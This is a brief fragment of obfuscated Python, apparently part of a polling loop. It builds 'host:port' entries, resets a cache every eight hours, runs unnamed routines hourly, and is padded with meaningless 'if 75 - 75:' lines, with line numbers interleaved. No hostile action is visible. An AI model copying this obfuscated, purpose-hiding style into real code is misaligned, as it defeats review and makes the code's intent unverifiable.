   if 75 - 75: Oo0Oo % oOOo0000o % oOoO0Ooo % I11I1Ii
9053
   ii1o00 . insert ( 0 , "%s:%d" % ( Oo0oOOooO0 , iII111iI ) )
9054
   iii1iiI111ii = True
9055
  Ii1i1iI1IiI = Iioo0OooOoO
9056
 if Iioo0OooOoO - O00oO0OOoOo > 28800 :
9057
  if 35 - 35: Ii . O0oo . O0oo0OOOOO00 + O0oo * i1 / O0oo
9058
  I1I1I11 = { }
9059
  O00oO0OOoOo = Iioo0OooOoO
9060
 if Iioo0OooOoO - o0o0o00oooOoo > 3600 :
9061
  if 54 - 54: Oooo
9062
  IIiii1ii = III1iiIiiI ( )
9063
  if len ( IIiii1ii ) >= 8 :
9064
   Ii111i11iIi ( IIiii1ii )
9065
   Ii111i11iIi ( iIiiiiii1III1 ( ) )
9066
  iiOo0000O ( )
9067
  o0o0o00oooOoo = Iioo0OooOoO
9068
  if 70 - 70: i1 % IIiII + Oo0Oo
9069
 time . sleep ( 0.01 )
9070
 if 87 - 87: I11I1Ii / oOoO0Ooo % i1
9071
 if 67 - 67: oOOoO00oo0 / O0oo % IIiIIiIii1I - o0ooO
9072
 if 69 - 69: oOOo0000o
9073
 if 60 - 60: OOooOO0 * IIiIIiIii1I . o0oooooO - IIiIIiIii1I + oOOoO00oo0 - Oo0
9074
 if 8 - 8: o0ooO . i1IIi1i1iiI . Oo0 % OOOoOooO